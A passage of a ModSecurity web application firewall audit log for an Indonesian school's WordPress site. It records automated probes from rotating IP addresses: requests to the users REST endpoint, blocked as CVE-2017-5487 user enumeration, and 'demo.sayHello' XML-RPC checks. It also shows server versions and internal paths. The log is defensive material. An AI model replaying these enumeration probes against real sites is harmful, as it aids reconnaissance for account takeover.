"17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445074456121 6952 (- - -) Stopwatch2: 1747445074456121 6952; combined=4906, p1=666, p2=4005, p3=36, p4=41, p5=94, sr=135, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77c6a805-Z-- --3e36f879-A-- [17/May/2025:08:24:56 +0700] aCflaHyxdQCiyU1ENFcnoQAAABE 103.236.140.4 43930 103.236.140.4 8181 --3e36f879-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3e36f879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e36f879-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445096978953 2788 (- - -) Stopwatch2: 1747445096978953 2788; combined=1255, p1=449, p2=776, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e36f879-Z-- --25887200-A-- [17/May/2025:08:25:03 +0700] aCflbxKi5m5upc8uMd6iLQAAAMY 103.236.140.4 43934 103.236.140.4 8181 --25887200-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --25887200-C-- demo.sayHello --25887200-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --25887200-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445103851855 5200 (- - -) Stopwatch2: 1747445103851855 5200; combined=3726, p1=502, p2=3029, p3=30, p4=31, p5=80, sr=65, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25887200-Z-- --8a96ab67-A-- [17/May/2025:08:25:07 +0700] aCflcwTOsBn9MSWb6WJunwAAAJg 103.236.140.4 43936 103.236.140.4 8181 --8a96ab67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a96ab67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a96ab67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445107190344 2828 (- - -) Stopwatch2: 1747445107190344 2828; combined=1228, p1=429, p2=766, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a96ab67-Z-- --343f1251-A-- [17/May/2025:08:25:12 +0700] aCfleATOsBn9MSWb6WJuoQAAAIM 103.236.140.4 43942 103.236.140.4 8181 --343f1251-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --343f1251-C-- demo.sayHello --343f1251-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --343f1251-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445112127377 5274 (- - -) Stopwatch2: 1747445112127377 5274; combined=3962, p1=513, p2=3235, p3=29, p4=32, p5=91, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --343f1251-Z-- --4eedc847-A-- [17/May/2025:08:25:14 +0700] aCflenyxdQCiyU1ENFcnowAAABI 103.236.140.4 43946 103.236.140.4 8181 --4eedc847-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4eedc847-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eedc847-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445114968003 2098 (- - -) Stopwatch2: 1747445114968003 2098; combined=1051, p1=365, p2=660, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eedc847-Z-- --68bba777-A-- [17/May/2025:08:25:15 +0700] aCfle3yxdQCiyU1ENFcnpAAAABM 103.236.140.4 43948 103.236.140.4 8181 --68bba777-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68bba777-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68bba777-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445115769630 2706 (- - -) Stopwatch2: 1747445115769630 2706; combined=1273, p1=424, p2=816, p3=0, p4=0, p5=33, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68bba777-Z-- --475aec7a-A-- [17/May/2025:08:25:20 +0700] aCflgHyxdQCiyU1ENFcnpQAAABQ 103.236.140.4 43954 103.236.140.4 8181 --475aec7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.15.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.15.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --475aec7a-C-- demo.sayHello --475aec7a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --475aec7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445120516607 5270 (- - -) Stopwatch2: 1747445120516607 5270; combined=3941, p1=503, p2=3224, p3=29, p4=33, p5=91, sr=73, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --475aec7a-Z-- --4f428c34-A-- [17/May/2025:08:25:22 +0700] aCflghKi5m5upc8uMd6iLwAAAMk 103.236.140.4 43956 103.236.140.4 8181 --4f428c34-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4f428c34-C-- demo.sayHello --4f428c34-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f428c34-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445122955611 5068 (- - -) Stopwatch2: 1747445122955611 5068; combined=3842, p1=428, p2=3200, p3=22, p4=23, p5=97, sr=74, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f428c34-Z-- --290a1b32-A-- [17/May/2025:08:25:27 +0700] aCflh3yxdQCiyU1ENFcnpgAAABU 103.236.140.4 43962 103.236.140.4 8181 --290a1b32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --290a1b32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --290a1b32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445127910946 2621 (- - -) Stopwatch2: 1747445127910946 2621; combined=1192, p1=437, p2=724, p3=0, p4=0, p5=30, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --290a1b32-Z-- --3e323b42-A-- [17/May/2025:08:25:35 +0700] aCflj3yxdQCiyU1ENFcnqAAAABg 103.236.140.4 43966 103.236.140.4 8181 --3e323b42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.253 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3e323b42-C-- demo.sayHello --3e323b42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e323b42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445135285933 6529 (- - -) Stopwatch2: 1747445135285933 6529; combined=4736, p1=630, p2=3867, p3=38, p4=43, p5=95, sr=110, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e323b42-Z-- --8275012e-A-- [17/May/2025:08:25:36 +0700] aCflkHyxdQCiyU1ENFcnqQAAAAA 103.236.140.4 43968 103.236.140.4 8181 --8275012e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8275012e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8275012e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445136002792 2471 (- - -) Stopwatch2: 1747445136002792 2471; combined=1198, p1=400, p2=770, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8275012e-Z-- --1e769d4f-A-- [17/May/2025:08:25:44 +0700] aCflmATOsBn9MSWb6WJupwAAAIw 103.236.140.4 43974 103.236.140.4 8181 --1e769d4f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e769d4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e769d4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445144116019 2234 (- - -) Stopwatch2: 1747445144116019 2234; combined=1062, p1=340, p2=691, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e769d4f-Z-- --69868904-A-- [17/May/2025:08:25:44 +0700] aCflmHyxdQCiyU1ENFcnqgAAAAE 103.236.140.4 43976 103.236.140.4 8181 --69868904-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --69868904-C-- demo.sayHello --69868904-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --69868904-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445144809636 4634 (- - -) Stopwatch2: 1747445144809636 4634; combined=3604, p1=415, p2=2986, p3=25, p4=26, p5=89, sr=63, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69868904-Z-- --91eb8267-A-- [17/May/2025:08:25:49 +0700] aCflnRKi5m5upc8uMd6iMQAAAMw 103.236.140.4 43982 103.236.140.4 8181 --91eb8267-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --91eb8267-C-- demo.sayHello --91eb8267-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --91eb8267-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445149989741 6369 (- - -) Stopwatch2: 1747445149989741 6369; combined=4621, p1=614, p2=3770, p3=38, p4=41, p5=95, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91eb8267-Z-- --01d06a34-A-- [17/May/2025:08:26:08 +0700] aCflsHyxdQCiyU1ENFcnrAAAAAM 103.236.140.4 43986 103.236.140.4 8181 --01d06a34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --01d06a34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01d06a34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445168369469 2759 (- - -) Stopwatch2: 1747445168369469 2759; combined=1227, p1=423, p2=775, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01d06a34-Z-- --8932826e-A-- [17/May/2025:08:26:17 +0700] aCfluXyxdQCiyU1ENFcnrQAAAAQ 103.236.140.4 43990 103.236.140.4 8181 --8932826e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8932826e-C-- demo.sayHello --8932826e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8932826e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445177859558 4652 (- - -) Stopwatch2: 1747445177859558 4652; combined=3616, p1=448, p2=2971, p3=22, p4=24, p5=89, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
